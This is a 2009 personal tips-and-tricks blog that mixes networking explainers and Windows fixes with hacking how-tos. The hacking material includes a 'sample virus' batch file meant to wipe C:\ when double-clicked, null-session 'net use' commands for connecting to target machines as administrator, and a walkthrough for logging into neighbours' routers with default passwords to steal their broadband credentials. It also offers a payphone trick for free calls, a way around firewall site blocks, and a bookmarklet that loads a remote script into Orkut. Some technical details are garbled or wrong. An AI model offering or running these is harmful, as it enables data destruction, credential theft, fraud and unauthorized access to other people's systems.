Friday, June 12, 2009

Bluetooth Technology

Bluetooth Technology

Bluetooth is the special technology used to interconnect Mobile phones, computers and
PDA (Personal Digital Assistant) using short range wireless connection.

Definition
--------------
Bluetooth wireless technology is a short-range communications technology intended to replace
the cables connecting portable and/or fixed devices while maintaining high levels of security.

Key features of Bluetooth
-----------------
Key features of Bluetooth technology are

1. robustness,
2. low power,
3. low cost.

Advatage
------------

1. Bluetooth enabled device can connect to other Bluetooth enabled devices.

2. Bluetooth enabled electronic devices connect and communicate wirelessly through
short-range, ad hoc networks known as piconets.

3. It has the ability to simultaneously handle both data and voice transmissions.


Specifications of Bluetooth
------------------------------

1. Frequency range: 2.4 to 2.485 GHz

2. Travel: full-duplex signal at a nominal rate of 1600 hops/sec.

Metropolitan Area Network (MAN)

Metropolitan Area Networks in short MAN usually covers the area of
a metropolitan city. This type of networks covers many kilometers.
A usual example to understand the concept is cable networks.
Cable TV networks covers a large city as MAN do. But the
difference is MAN is a computer networks whether cable TV
connection connects television.

Technologies used
----------------------

The technologies used to implement MAN are....

1. ATM (Asynchronous Transfer Mode)

2. FDDI

3. SMDS

4. Ethernet based MAN


MAN standard for data communication
-------------------------------------

Distributed Queue Dual Bus (DQDB) is the Metropolitan Area Network standard for data communication. It is specified in the IEEE 802.6 standard.Using DQDB, networks can be up to 30 miles long and operate at speeds of 34 to 155 Mbit/s.

Getting error code 0x80070424 after running Windows live update

1. Go to Start>Run
2. Type regsvr32 wuaueng.dll
3. Click on OK wait a few seconds, then click on OK in the RegSvr32 dialogue box.

Now, open the registry editor

1. Click on Start>Run key in regedit then click on OK

Navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv

Look for a DeleteFlag value and, if it exists, right-click on it and select
Delete.

Malicious code to delete the content of the c folder (Sample Virus)

To delete the content of C folder on your computer simply type the following code in a note pad and save as .bat format. If some one double click the file it will automatically delete all the contents on the C:\ folder.


The code is:

@Echo off
Del C:\ *.* |y

NBTSTAT - How to use this command on your computer

Nbtstat is a dos command to help troubleshoot NetBIOS name resolution problems. When a network is functioning normally, NetBIOS over TCP/IP (NetBT) resolves NetBIOS names to IP addresses.


The proper usage of NBTSTAT command is:


NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]


Where the different syntaxes are explained below.

NBTSTAT -a (adapter status) Lists the remote machine's name table given its name
NBTSTAT -A (Adapter status) Lists the remote machine's name table given its
IP address.
NBTSTAT -c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
NBTSTAT -n (names) Lists local NetBIOS names.Displays protocol statistics and current TCP/IP connections using NBT(NetBIOS over TCP/IP).
NBTSTAT -r (resolved) Lists names resolved by broadcast and via WINS
NBTSTAT -R (Reload) Purges and reloads the remote cache name table
NBTSTAT -S (Sessions) Lists sessions table with the destination IP addresses
NBTSTAT -s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
NBTSTAT -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh


The other terms are:

RemoteName: Remote host machine name.
IP address: Dotted decimal representation of the IP address.
Interval: Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.

ping; transmit failed, error code 10045 solution of the error

The possible step to fix the error code 10045 is to remove TCP/IP protocol and reload it with some other minor tries.

Monday, May 11, 2009
ping; transmit failed, error code 10045 solution of the error

The possible step to fix the error code 10045 is to remove TCP/IP protocol and reload it with some other minor tries.



Steps to fix the error "ping; transmit failed, error code 10045"



The way we troubleshoot the error message is:


1. Disable Firewall on your computer

2. Perform a Winsocket rest and check for the issue


To perform Winsock reset type the command "netsh winsock reset" on command prompt without"" and press enter.


3. Remove TCP/IP suit on your computer

To remove the TCP/IP suit on your computer type "netsh int ip reset c:\tcp.txt" on command prompt without "" and press enter.


4. Reboot your computer

How to secure your Local Wireless Network from hackers

A K A S H

Now a days we are seeing a large migration to wireless network from old fashioned wired ethernet. The new wireless standards like Wireless N offered the same speed of data transfer compared to fast ethernet though it is not yet possible. But in near future it will be possible. So what is the major advantage of wireless over wired network is we can avoid the long irritating cables. But the major headache with wireless is it spreads through an area where any one can access it. So securing wireless network from unautherized access is very important. The major points in securing your wireless network are:

1. Set WPA on your wireless router


The most important thing to secure your wireless network is to set a wireless key on your wireless router. But we should use WPA(Wired Equielent Privacy) encryption instead of WEP. WEP is vulnarable and many tests conducted to prove it.


2. Reduce the area of wireless transmission


The next step we can do is reduce the area of wireless coverage. If we can reduce the area of wireless transmission in to our premises, it will be difficult for others to sneak in to it.


3. Enable MAC filtering on your wireless router


It is advisable to enable MAC filtering on your wireless router. We should allow only specific computers with allowing their MAC address only in to the network. All other computers with different MAC address will be rejected from the wireless network.


4. Hide your wireless network name (SSID)


It is another security precaution. We should hide our wireless network name by not broadcasting the SSID(Service Set Identifier). SSID is the technical name of wireless network name. So it will be one more obstacle in hackers way.


5. Set a strong password for your wireless router


It is the last point in securing the network. You should set a strong password for your wireless router after configuring it. Most of the users left it with the default password as it is the admin or simply the vendor name.

access websites if domin name and ip are blocked

Some times the domain name and the domain IP address of websites blocked in your School or work Firewall. Some times the ISP blocks some websites for its users. You might be in a situation where you cannot use proxy services or even them are blocked on your network. You can still access those websites without typing the domain name or the domain IP address. The method is:

am here demonstrating this method by accessing google.com. This method will work for any other websites but for the beginners google is the best option.

1. Find the IP address of google.com

To find the IP address of google.com follow the steps below.

1. Go to command prompt and type

ping google.com

2. The IP address of google.com will be displayed

Tuesday, May 26, 2009
Access websites if domain name and IP are blocked

Some times the domain name and the domain IP address of websites blocked in your School or work Firewall. Some times the ISP blocks some websites for its users. You might be in a situation where you cannot use proxy services or even them are blocked on your network. You can still access those websites without typing the domain name or the domain IP address. The method is:


Steps to access blocked websites with simple mathematics

am here demonstrating this method by accessing google.com. This method will work for any other websites but for the beginners google is the best option.

1. Find the IP address of google.com

To find the IP address of google.com follow the steps below.

1. Go to command prompt and type

ping google.com

2. The IP address of google.com will be displayed







By sijugk


2. Covert the Decimal form of IP address to binary

To convert the decimal form to binary I recommend you to take the assistance of a scientific calculator.

Here the IP address of google is 74.125.45.100 and it will be converted to the set of octects.

74 = 01001010

125 = 01111101

45 = 00101101

100= 01100100

Please make sure that it is a set of actects by adding 0 infront of the binary number where it cannot match 8 bits in the set.

So finally 74.125.45.100 will become;

01001010.01111101.00101101.01100100

3. Take the sum of total

To perform this step we need to remove the dots between the octets. So the binay number will look like:

01001010011111010010110101100100


To convert this number to decimal we get 1249717604


4. Type the decimal number on the address bar

Now we need to type the decimal number on the address bar of Internet Explorer as in the format http://1249717604 and it will be redirected to google.com.

Network Address Translation

Network Address Translation(NAT) is the process of converting one IP address to a different IP address. Simply it is the process of mapping one IP address to another. Why we need NAT and map one IP to another? The answer is a little bit big. Currently we adopts IPv4 to generate unique IP addresses for all the computers connected to the Internet. But we know that today's increased popularity of Internet make it difficult to assign unique IP address to all the computers connected to Internet. Growth of bigger companies shows thousands of computers in a company is nothing and with in many networks thousands of thousand computers are available. Is it possible to provide unique IP address to all the computers in these kinds of large companies ? No, so the idea of NAT invented.

Using the concept of Network Address Translation (NAT) we can easily assign IP address to all the computers present in the bigger companies by spending few actual addresses. Before explaining it we need to know the concept of private IP address and public IP address. Private IP address is a set of IP addresses which is not using for connecting to Internet. The ranges of private IP addresses are described below.

10.0.0.0 to 10.255.255.255

172.16.0.0 to 172.31.255.255

192.168.0.0 to 192.168.255.255

The computers in companies and a LAN are addressed by using private IP addresses. But by using private IP addresses they cannot access Internet. So the company should purchase a set of public IP addresses and using NAT they will convert the private IP address to the valid public IP address. So we can avoid the headache of assigning unique IP address to all computers present in the corporates. To implement it we are loosing the private IP addresses but we can use the same set of private IP addresses to the computers in a different corporate network. So NAT and the concept of private IP addresses helps us in better utilization of IP address.


Types of NAT


The NAT is divided in to the following categories.

1. Static NAT

2. Dynamic NAT

3. Port Address Translation (PAT)


In static NAT one unregistered (private) IP address is mapped to one registered (public) IP address. This kind of mapping is predefined one.
In dynamic NAT a pool of public IP addresses is shared by an entire private IP subnet. This mapping is not predefined but it is dynamic.In Port Address Translation (PAT)multiple unregistered IP addresses map to a single registered IP address by different TCP/UDP port numbers.

So in a nutshell:

1. That same company using NAT would only need 1 public IP address and would assign the computers on the local network internal IP addresses.

2. Hiding property of NAT

This “hiding” of the internal IP addresses works not onlyto allow for more Hosts to share the Internet, but also as a layer of security. By not allowing the outside world to know the precise IP addresses of your internal Hosts you take away a key piece of information that hackers could use to break into your network.

PPOE configuration in Ubuntu Linux --- Linux Networking tutorial

1. Go to systems and select preference

2. Click on Network Configuration

3. Go to DSL tab and click Add

4. Enter the connection name which you would like to give

5. Type the user name and password from your service provider at the user name and password field

6. Click OK and connect your computer to the Internet using PPPoE by selecting your connection from the Network chooser.

Wednesday, June 10, 2009

CMD HACKING COMMANDS

am Sure u guys Know All these commands.... I want to Help The Beginers.. So i am Posting This....

Useful Things to do on CMD!

First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.

Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.

This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).

Back to commands:

Code:

Code:
nslookup net view net use net user ping tracert arp route nbtstat netstat ipconfigIn case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

Code:

Code:
ping x.x.x.x (x is the IP address)or

Code:
ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP)OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).

nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP)

Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

Code:

Code:
nslookup (enter) set type=mx (enter) yahoo.comThis command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.com/forums/showth...&threadid=2360

3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

OBS: This command is good to know the route a packet takes before it goes to the target box.

Code:

Code:
tracert x.x.x.x (x is the IP address)or

Code:
tracert www.whatever.com (www.whatever.com is the website you don't know the IP)4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

Code:

Code:
arp -a5) route : This command will show you the routing table, gateway, interface and metric.

Code:

Code:
route print6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.

Code:

Code:
ipconfigor

Code:

Code:
ipconfig /allthis command will give all that info but for all networks you might have it.

Also, in case you have a dynamic IP and want to change it, then type...

Code:

Code:
ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP)OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid.

7) netstat : This command will show you connection to your box.

Code:

Code:
netstator

Code:

Code:
netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above)8)nbtstat : This command will show you the netbios name of the target box.

Code:

Code:
nbtstat -A x.x.x.x (x is the IP address) nbtstat -a computernamenet view x.x.x.x or computername (will list the available sharing folders on the target box)


Now some hints:

Code:

Code:
net use \ipaddressipc$ "" /user:administrator(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

Code:

Code:
net use K: \computernameC$(this will create a virtual drive on your "my computer" folder)

OBS: Keep in mind that this will only works if the target box doesn't have an administrator password set.

And least but not last, the "help" command.

Code:

Code:
whatevercommand /helpor

Code:

Code:
whatevercommand /?This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.[/hide]
__________________

Monday, June 8, 2009

Lock My Computer - access control PC security tools, free downloads




Lock My Computer

Version: 3.6
Date: 06/25/06
Size: 829 KB
Price: $49.95

Compatibility:

Windows 2000
Windows XP
Windows 2003
Windows Vista




Lock My Computer


Lock My Computer

Version: 3.6
Date: 06/25/06
Size: 829 KB
Price: $49.95

Compatibility:

Windows 2000
Windows XP
Windows 2003
Windows Vista

Purchase Lock My Computer

Download Lock My Computer

View screen shots of Lock My Computer

Lock My Computer is a powerful desktop security solution for personal or publicly accessible computers running the Windows 2000/XP/Server 2003 Operating Systems. It disallows unauthorized changes to various settings of the Windows system, such as Control Panel, Desktop, Local Security Policies, Outlook Express account settings, and many more others. It can disable access to local hard disks, Floppy, CDROM, and removable drives or make them read-only. By locking and hiding or making read-only of programs, files, and folders, Lock My Computer can prevent them from being launched, modified or deleted. Lock My Computer supports creating unlimited number of user accounts with each one has his own password and protection list. Additional features include password protected launching and uninstallation of itself, preventing malicious changes on the Internet Explorer, step by step easy-to-use security configuration wizard, export/load security profile, and supports for all formats of FAT/FAT32/NTFS.

Here are the top reasons you should use Lock My Computer:
Restricts use of CD-ROM, floppy, removable storage disk.
Prevents changes to various Windows settings.
Restricts running of selected applications.
Password-protects and hides files and folders.
Password-protects launch and uninstallation of itself.
Prevents others from deleting, renaming, moving, or modifying important files.
Supports an unlimited number of user accounts.
Protection profiles you create are fully reusable.
Prevents Internet Explorer from being hijacked.
Keeps working under Windows Safe Mode.
Works under the following file systems: FAT/FAT32/NTFS.http://www.pc-safety.com/security-tools.html

Why is my Internet connection so slow?

Question:

Why is my Internet connection so slow?
Answer:

A slow Internet connection could be caused by any number of reasons. Below is a short list of some of the more common reasons your Internet connection may be slow. As mentioned at the bottom of this page there is no magic program or tweak that will increase your overall Internet speed, but this page can give you a better understanding of why it may be slow.

Note: If everything on your computer is slow including the Internet, this may be another issues. See document CH000179.

Slow Internet connection

If you're using a dial-up connection or a modem this will be much slower than any type of broadband connection or connection you may be using at work or school. If you're using a modem no mater how fast your computer is the speed of the Internet will remain the same or very close and can cause some users to believe their computer is slow.

If broadband is available in your area and you would like a much more enjoyable experience on the Internet we highly recommend getting it. See our broadband definition for additional information on this term and the types of broadband available.

Type of site or download

Depending on the type of site you're visiting or the download you're receiving your Internet connection may appear to be slow. A site such as Computer Hope, which is 90% composed of text documents will load much faster than a website such as YouTube, which is composed of movie files.

Downloading while browsing

If you're doing more than one thing while on the Internet you'll notice browsing the Internet is slower. For example, if you or your kids are downloading a game, movie, music, or other type of file. While the computer is getting that data all other browsing will be slower.

Time of day or day

The time of day or what day it is can often affect the overall speed of the Internet as well as your individual connection. When more people are online, servers and Internet connections can become overloaded and cause delays in the response. In addition users who are using broadband cable to connect to the Internet share an individual cable with neighbors who are also subscribed. If all your neighbors are on at the same time you will notice a decrease in your speed.

Times when people are at home, e.g. off from work or school (after 3PM) or weekends (Saturday / Sunday) are often slow times. Sites like Internet Traffic Report actually report the flow of data around the world. This type of site can give you a rough idea of busy times.

Server or website location

The location of the web page you're visiting can also determine the speed of the Internet. If you're accessing a web page that is in a different part of the world it will be much slower than a page that is hosted closer to you.

Visitors on site

A server or web site can often only handle so many people at once. If hundreds, thousands, or millions of people are trying to visit the site at once that page will be much slower and in some cases pages may not even respond.

Network or site maintenance

If your Internet service provider or the host of the web site is performing maintenance on their network, computers, or network equipment this can cause speed related issues.

Other major event

If a major event is occurring around the world, it may cause speed related issues. For example, during the tragic events of September 11, 2001, where terrorists attacked United States many of the news sites were so overwhelmed with visitors that they would either take several minutes to load or not load at all.

Third-party programs and tweaks

No matter how many web services and/or programs you see advertised there is no magic program or tweak that is going to increase your actual overall Internet speed. There are some tweaks that can be done and some programs that can help with the speed of downloading certain files or increase your local network speed (not Internet). But no program that will increase the overall speed of your Internet connection.

Some programs such as download managers can help get downloads faster by downloading bits of a file being downloaded through different connections. However, this does not increase your Internet browsing experience and will not work with all Internet web page. For those interested in these programs see document CH001139.
Additional information:

* Information about how you can test your Internet connection can be found on document CH000539.
* Additional information about why your online game may be slow can also be found on document CH000620.

Talk 999 min for almost free this trick only for my....

talk free from 1 rupee coin box..
Check this talk free from 1 rupee coin box..
100% Works !
yes u can talk free from 1 rupee coin box
wht u hve 2 do is first pick up the reciever
dial *** then 68807 then first 7 no.s which u r calling then #" 999"
this 999 is for your limit u can talk 999 min so u can only press no.s like this for eg
333 , 444, 555 do 999 it will be better then #0
then insert the coin nd dial full number nd u can talk for 999 minutes free
full code ***68807 first seven no.s #999#0
imp thing ------ this only works on red 1 rupee coin box do it..
It works 100% !!!

Hack sify broaband

akash iam not sure becu iam not use..........

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)
Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17
Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255
Step 4: Then check in your scanner which alive IPs has the port 80 open
Step 5: Enter that alive IP in your web browser
Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.
Step 8: use ShowPassword or Revelation software to view the password in asterisks
Now You have Username/Password
Enjoy! Grin

Task manager has been disabled by administrator

Task manager has been disabled by administrator
To solve this problem we have to methods Method 1
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 0 /f
Method 2
Download and run this REG fix and double-click it.
Method 3
* Click Start, Run and type Regedit.exe
* Navigate to the following branch:

HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies System
* In the right-pane, delete the value named DisableTaskMgr
* Close Regedit.exe

Method 4: Using Group Policy Editor - for Windows XP Professional
* Click Start, Run, type gpedit.msc and click OK.
* Navigate to this branch:

User Configuration / Administrative Templates / System / Ctrl+Alt+Delete Options / Remove Task Manager

* Double-click the Remove Task Manager option.
* Set the policy to Not Configured.
Search more tricks and tips

Sunday, June 7, 2009

Now get your computer to be really fast..

Guys Now get your computer to be really fast..
" All u need is a High GB Pendrive "
Follow these steps :-
1. Insert the Pen Drive (1Gb atleast) in the USB port
2. Let the PC do what it wants to do to detect it..
3. After he finished his work, you have to act smart
" Here goes the real thing "
4. My Computer -> Properties
5. Advanced -> Performance Settings
6. Advanced -> Change
7. Select the Pen Drive
8. Click on Custom Size
" Check the value of space available "
9. Enter the same in the Initial and the Max columns
" You just used the space of the PenDrive as a Virtual Memory "
10. Now u have to release the memory from C: to make the PC faster
11. Select the C: and Click on Custom Size
12. Decrease the size to as low as u want.. Not "0" please..
13. Restart...
" VOILA !!! Your PC is fast and furious "
Search more tricks and tips

Who Used Your Pc In Your Absence

Who Used Your Pc In Your Absence,what Did He Do?
first you should go
start > run >eventvwr.msc
Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.
Hope u all will like it.
Thnks n enjoy

19 Secrets about Windows XP AKASH

You’ve read the reviews and digested the key feature enhancements and operational changes. Now it’s time to delve a bit deeper and uncover some of Windows XP
’s secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type ’systeminfo’. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type ’systeminfo > info.txt’. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run… and type ‘gpedit.msc’; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care — some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter ‘rundll32.exe user32.dll,LockWorkStation’ in the location field. Give the shortcut a name you like. That’s it — just double click on it and your computer will be locked. And if that’s not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word ‘hide’ and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include ‘eventcreate’ and ‘eventtriggers’ for creating and watching system events, ‘typeperf’ for monitoring performance of various subsystems, and ’schtasks’ for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options — they’re all far too baroque to go into here.

6. XP has IP version 6 support — the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type ‘ipv6 install’ into Run… (it’s OK, it won’t ruin your existing network setup) and then ‘ipv6 /?’ at the command line to find out more. If you don’t know what IPv6 is, don’t worry and don’t bother.

7. You can at last get rid of tasks on the computer from the command line by using ‘taskkill /pid’ and the task number, or just ‘tskill’ and the process number. Find that out by typing ‘tasklist’, which will also tell you a lot about what’s going on in your system.

8. XP will treat Zip files like folders, which is nice if you’ve got a fast machine. On slower machines, you can make XP leave zip files well alone by typing ‘regsvr32 /u zipfldr.dll’ at the command line. If you change your mind later, you can put things back as they were by typing ‘regsvr32 zipfldr.dll’.

9. XP has ClearType — Microsoft’s anti-aliasing font display technology — but doesn’t have it enabled by default. It’s well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who’s using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum’s real IP address — they can find this out by going to http://www.whatismyip.com — and get them to make sure that they’ve got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As… and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run… from the start menu and type ‘control userpasswords2′, which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options… and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can’t see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You’ll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By… Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks — if it found the picture on the Internet when you copied the tracks from the CD. If it didn’t, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

IPV6 INSTALLATION FOR WINDOWS XP.

his protocol is distined to replace the Internet Protocal Version 4 used by Internet Explorer it uses hexadecimal ip addresses instead of decimal example (decimal ip 62.98.231.67) (hexadecimal IP 2001:6b8:0:400::70c)
To install To install the IPv6 Protocol for Windows XP:
Log on to the computer running Windows XP with a user account that has local administrator privileges. Open a command prompt. From the Windows XP desktop, click Start, point to Programs, point to Accessories, and then click Command Prompt. At the command prompt, type: ipv6 install
For more information on IPv6, visit the site below:
CODEhttp://www.microsoft.com/windowsxp/pro/techinfo/a

How to avoid autoplay of CD ? Way I like best tip.

Hey this time no registry trick even though there are ways in registry to do it. In earlier operating systems only those CD that had autorun.inf file in their root directory were able to execute on its own but with advent of WINDOWS XP it has become possible with just about anything. Well sometimes it is good but there are other times when you want to avoid this part of automation. What would I do. Simply press SHIFT key when you enter a CD in your CD drive
. It won’t Auto play. For those of you, who do want a registry hack. Here it is:
Open Registry and navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] and look for key “NoDriveTypeAutoRun” and set its value to 185 (decimal). This would stop autoplay.

Where does Window’s Product Id get stored Tip:

There are two places at least where ProductId gets stored. To see the first place, open Registry by going to START-RUN and entering REGEDIT and Navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]. In right pane, look for key by the name “ProductId”. This is your Windows Product Id. Alternatively you can navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion] and still find same field with the name ProductId.

Orkut Send scrap to all free now

use this

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.geocities.com/orkuttheme/script.user.js';void(0)

akash tips & tricks

About Me

My photo
mumbai, mumbai, India
akash....... hacking tips & track plz use only for knowledge plz dont use misuse..........